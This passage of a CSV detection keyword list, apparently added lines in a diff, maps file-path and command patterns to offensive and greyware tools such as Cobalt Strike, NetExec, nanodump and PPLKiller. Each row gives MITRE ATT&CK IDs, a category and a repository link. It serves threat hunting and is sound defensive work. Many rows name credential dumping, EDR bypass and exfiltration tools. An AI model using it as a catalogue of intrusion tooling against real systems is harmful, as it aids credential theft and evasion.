TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" +"*\ParsedMalleableData.txt*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*\parsers\nessus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\Passwordfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*\PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*\payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*\PEASS-ng*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*\PerfExec.exe*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" +"*\Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data 
Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\Persistence.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\petitpotam.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\pipe\brutepipe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*\PipeViewer.exe*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*\PipeViewer.sln*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" 
+"*\PipeViewer\Program.cs*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*\PoC\PrivilegeEscalation*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" +"*\POC_DLL.vcxproj*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*\polenum.py*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*\portbender.*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*\PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*\PostDump.exe*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" +"*\powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*\powerglot\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\Powermad*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*\power-pwn\*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*\powershell.exe* += 
hidden*","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\powershell.exe* +=hidden*","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\powershell.exe* = hidden*","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\powershell.exe* =hidden*","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\PowershellKerberos*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\powerup.exe*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\Powerup.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*\PowerUp.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\PowerView.cna*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*\PowerView.exe*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*\Powerview.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
+"*\PowerView.ps1*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*\PowerView3.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","0","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z"
+"*\ppl_dump.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*\PPLBlade-main*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
+"*\PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*\PPLKiller*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z"
+"*\printnightmare.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\PrintSpoofer.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
+"*\PrintSpoofer-1.0.zip*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z"
+"*\PrivEditor\*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
+"*\PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*\PrivKit\*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z"
+"*\procdump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\Process Hacker 2\*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A"
+"*\process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z"
+"*\ProduKey.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. 
and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\Program Files\FreeFileSync*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
+"*\ProgramData\asrephashes.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\ProgramData\shares.txt*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*\ps2exe.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*\PS2EXE\*.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*\PsExecLog.log*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z"
+"*\PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*\PSPY.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
